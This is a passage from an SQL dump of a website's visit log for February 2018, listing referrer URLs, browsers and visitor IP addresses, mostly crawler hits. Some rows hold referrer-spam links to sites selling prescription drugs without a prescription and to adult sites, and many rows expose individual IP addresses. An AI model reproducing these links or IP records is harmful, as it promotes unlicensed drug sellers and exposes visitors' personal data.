6.220.152.164','000',1,0),(20218,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',1,0),(20219,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',1,0),(20220,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',1,0),(20221,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',1,0),(20222,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(20223,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',1,0),(20224,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(20225,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',3,0),(20226,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',1,0),(20227,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',1,0),(20228,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',2,0),(20229,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',2,0),(20230,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',1,0),(20231,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.10','000',1,0),(20232,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(20233,'2018-02-08','https://zphiblgz.org','Chrome','Windows','55.0.2883.87','','89.248.174.138','000',2,0),(20234,'2018-02-08','https://zphiblgz.org','Firefox','Windows','40.1','','49.149.59.21','000',2,0),(20235,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',3,0),(20236,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(20237,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',2,0),(20238,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.136','000',1,0),(20239,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',2,0),(20240,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(20241,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',2,0),(20242,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(20243,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(20244,'2018-02-08','https://zphiblgz.org','Firefox','Windows','40.1','','80.178.190.236','000',2,0),(20245,'2018-02-08','https://zphiblgz.org','Safari','Macintosh','5.1.9','','78.46.156.169','000',1,0),(20246,'2018-02-08','https://r.search.yahoo.com/_ylt=A0LEVzaM93xa9UMAZ6dXNyoA;_ylu=X3oDMTEya2FlMTE3BGNvbG8DYmYxBHBvcwM4BHZ0aWQDQjUyODVfMQRzZWMDc3I-/RV=2/RE=1518168076/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=8P5VwEqIqhwTZrYmtwQ3Ia8clXU-','MSIE','Windows','11.0','','108.51.38.36','000',4,0),(20247,'2018-02-08','https://buynorxx.com/','Unknown','Unknown','Unknown','','46.118.225.78','000',3,0),(20248,'2018-02-08','https://pills24h.com/buy-doxycycline-online-without-prescription/','Opera','Windows','7.11','','46.118.225.78','000',3,0),(20249,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.161','000',2,0),(20250,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.212','000',3,0),(20251,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.19','000',1,0),(20252,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',3,0),(20253,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',3,0),(20254,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',1,0),(20255,'2018-02-08','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.198.240.60','000',2,0),(20256,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(20257,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',1,0),(20258,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',3,0),(20259,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',2,0),(20260,'2018-02-08','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.247.9.183','000',2,0),(20261,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',2,0),(20262,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.141','000',1,0),(20263,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(20264,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',1,0),(20265,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.244','000',1,0),(20266,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.102','000',2,0),(20267,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.250','000',1,0),(20268,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',1,0),(20269,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',1,0),(20270,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',2,0),(20271,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',2,0),(20272,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',2,0),(20273,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(20274,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',1,0),(20275,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',1,0),(20276,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',2,0),(20277,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',1,0),(20278,'2018-02-08','https://natprof.ru/','MSIE','Windows','5.5','','37.115.184.155','000',2,0),(20279,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',3,0),(20280,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',2,0),(20281,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(20282,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',2,0),(20283,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',1,0),(20284,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',1,0),(20285,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(20286,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.136','000',1,0),(20287,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',2,0),(20288,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',2,0),(20289,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(20290,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',1,0),(20291,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.203','000',2,0),(20292,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(20293,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(20294,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.218','000',2,0),(20295,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',2,0),(20296,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(20297,'2018-02-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(20298,'2018-02-09','http://strady.org.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(20299,'2018-02-09','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.140','','73.135.220.207','000',2,0),(20300,'2018-02-09','https://www.google.com/','Safari','iPhone','11.0','','70.106.198.154','000',5,0),(20301,'2018-02-09','https://zphiblgz.org','curl','Unknown','7.35.0','','52.58.12.201','000',2,0),(20302,'2018-02-09','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','216.164.192.25','000',1,0),(20303,'2018-02-09','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.4','000',1,0),(20304,'2018-02-09','http://pospektr.ru/','Opera','Windows','7.0','','46.119.115.60','000',3,0),(20305,'2018-02-09','https://pills24h.com/buy-clonidine-online-without-prescription/','MSIE','Windows','5.5','','46.118.225.78','000',3,0),(20306,'2018-02-09','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(20307,'2018-02-09','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','81.2.195.184','000',2,0),(20308,'2018-02-09','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(20309,'2018-02-09','https://zphiblgz.org','MSIE','Windows','8.0','','67.205.142.71','000',2,0),(20310,'2018-02-09','https://zphiblgz.org','MSIE','Windows','10.0','','67.205.142.71','000',1,0),(20311,'2018-02-09','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','67.205.142.71','000',2,0),(20312,'2018-02-09','https://zphiblgz.org','Firefox','Windows','21.0','','67.205.142.71','000',2,0),(20313,'2018-02-09','http://popugauka.ru/','MSIE','Windows','5.0','','46.119.113.175','000',2,0),(20314,'2018-02-09','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.147.244.219','000',2,0),(20315,'2018-02-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',2,0),(20316,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','94.41.211.106','000',2,0),(20317,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',2,0),(20318,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',2,0),(20319,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',5,0),(20320,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',2,0),(20321,'2018-02-09','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.6','000',1,0),(20322,'2018-02-09','zphiblgz.org','Chrome','Windows','46.0.2754.75','','37.187.88.203','000',2,0),(20323,'2018-02-09','http://zphiblgz.org/wp-content/common.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(20324,'2018-02-09','https://pills24h.com/buy-zoloft-online-without-prescription/','Opera','Windows','8.01','','37.115.184.155','000',2,0),(20325,'2018-02-09','https://zphiblgz.org','Firefox','Windows','58.0','','150.148.14.155','000',3,0),(20326,'2018-02-09','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(20327,'2018-02-09','https://zphiblgz.org','Safari','iPhone','10.0','','50.225.39.86','000',8,0),(20328,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',2,0),(20329,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',2,0),(20330,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',1,0),(20331,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.209','000',3,0),(20332,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.135','000',1,0),(20333,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','176.121.215.126','000',2,0),(20334,'2018-02-09','http://rieltor.crimea.ua/','MSIE','Windows','6.0','','37.115.184.155','000',1,0),(20335,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.144','000',1,0),(20336,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.151','000',2,0),(20337,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',1,0),(20338,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.185','000',1,0),(20339,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.230','000',1,0),(20340,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.209','000',4,0),(20341,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',4,0),(20342,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',3,0),(20343,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',1,0),(20344,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',2,0),(20345,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',1,0),(20346,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',3,0),(20347,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',2,0),(20348,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',2,0),(20349,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',1,0),(20350,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(20351,'2018-02-09','http://www.bing.com/search?q=amazon','MSIE','Windows','8.0','','70.42.131.170','000',2,0),(20352,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',1,0),(20353,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',2,0),(20354,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.153','000',3,0),(20355,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',1,0),(20356,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.149','000',1,0),(20357,'2018-02-09','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(20358,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.243','000',2,0),(20359,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',2,0),(20360,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.187','000',1,0),(20361,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.107','000',1,0),(20362,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.87','000',1,0),(20363,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',1,0),(20364,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',3,0),(20365,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',3,0),(20366,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',2,0),(20367,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(20368,'2018-02-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.35','000',1,0),(20369,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','46.229.158.109','000',2,0),(20370,'2018-02-09','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(20371,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(20372,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',3,0),(20373,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',2,0),(20374,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',2,0),(20375,'2018-02-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(20376,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',3,0),(20377,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.18','000',1,0),(20378,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',2,0),(20379,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',1,0),(20380,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.97','000',1,0),(20381,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',2,0),(20382,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',2,0),(20383,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',1,0),(20384,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',1,0),(20385,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',1,0),(20386,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(20387,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(20388,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.116','000',3,0),(20389,'2018-02-09','https://buynorxx.com/','MSIE','Windows','6.0','','46.119.115.60','000',2,0),(20390,'2018-02-09','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.71.62.66','000',2,0),(20391,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.140','000',2,0),(20392,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.54','000',2,0),(20393,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.46','000',1,0),(20394,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.93','000',1,0),(20395,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.158','000',1,0),(20396,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.103','000',1,0),(20397,'2018-02-09','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','132.148.194.150','000',2,0),(20398,'2018-02-09','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(20399,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(20400,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.200','000',2,0),(20401,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',1,0),(20402,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.199','000',2,0),(20403,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',2,0),(20404,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.27','000',1,0),(20405,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.154','000',1,0),(20406,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',3,0),(20407,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.148','000',1,0),(20408,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.49','000',1,0),(20409,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.210','000',1,0),(20410,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','2.227.248.75','000',2,0),(20411,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.87','000',1,0),(20412,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',2,0),(20413,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',1,0),(20414,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.209','000',4,0),(20415,'2018-02-09','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','159.203.99.125','000',1,0),(20416,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',4,0),(20417,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',5,0),(20418,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',1,0),(20419,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',2,0),(20420,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','173.56.72.228','000',2,0),(20421,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',2,0),(20422,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.146','000',2,0),(20423,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.219','000',1,0),(20424,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.224','000',1,0),(20425,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',1,0),(20426,'2018-02-09','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','71.126.169.194','000',5,0),(20427,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.75','000',1,0),(20428,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.16','000',1,0),(20429,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.91','000',1,0),(20430,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.194','000',1,0),(20431,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.66','000',1,0),(20432,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.29','000',1,0),(20433,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.212','000',1,0),(20434,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.179','000',1,0),(20435,'2018-02-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(20436,'2018-02-09','http://doxyporno.com/','Opera','Windows','9.01','','46.119.113.175','000',3,0),(20437,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',4,0),(20438,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',4,0),(20439,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',2,0),(20440,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(20441,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.116','000',2,0),(20442,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.55','000',1,0),(20443,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.206','000',2,0),(20444,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.16','000',2,0),(20445,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.19','000',1,0),(20446,'2018-02-09','https://zphiblgz.org','Edge','Windows','16.16299','','68.33.113.91','000',11,0),(20447,'2018-02-09','https://avtorskoe-vino.ru/','MSIE','Windows','3.02','','46.119.113.175','000',3,0),(20448,'2018-02-09','http://whoiswho.crimea.ua/','MSIE','Windows','5.5','','46.119.113.175','000',1,0),(20449,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',2,0),(20450,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',1,0),(20451,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',1,0),(20452,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',3,0),(20453,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',1,0),(20454,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',2,0),(20455,'2018-02-09','http://www.google.com/','Chrome','Android','64.0.3282.137','','64.134.242.175','000',5,0),(20456,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',2,0),(20457,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',2,0),(20458,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',2,0),(20459,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',2,0),(20460,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',3,0),(20461,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(20462,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',2,0),(20463,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',1,0),(20464,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','77.27.45.11','000',2,0),(20465,'2018-02-09','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','77.120.125.23','000',2,0),(20466,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',1,0),(20467,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.246','000',2,0),(20468,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',2,0),(20469,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',1,0),(20470,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.225','000',2,0),(20471,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(20472,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(20473,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',1,0),(20474,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',1,0),(20475,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',2,0),(20476,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',1,0),(20477,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',1,0),(20478,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',1,0),(20479,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',2,0),(20480,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',1,0),(20481,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',5,0),(20482,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(20483,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',1,0),(20484,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(20485,'2018-02-09','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(20486,'2018-02-09','http://zphiblgz.org/','MSIE','Windows','11.0','','144.217.69.239','000',1,0),(20487,'2018-02-09','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','173.236.184.14','000',2,0),(20488,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',1,0),(20489,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',1,0),(20490,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',3,0),(20491,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',2,0),(20492,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',2,0),(20493,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(20494,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',2,0),(20495,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','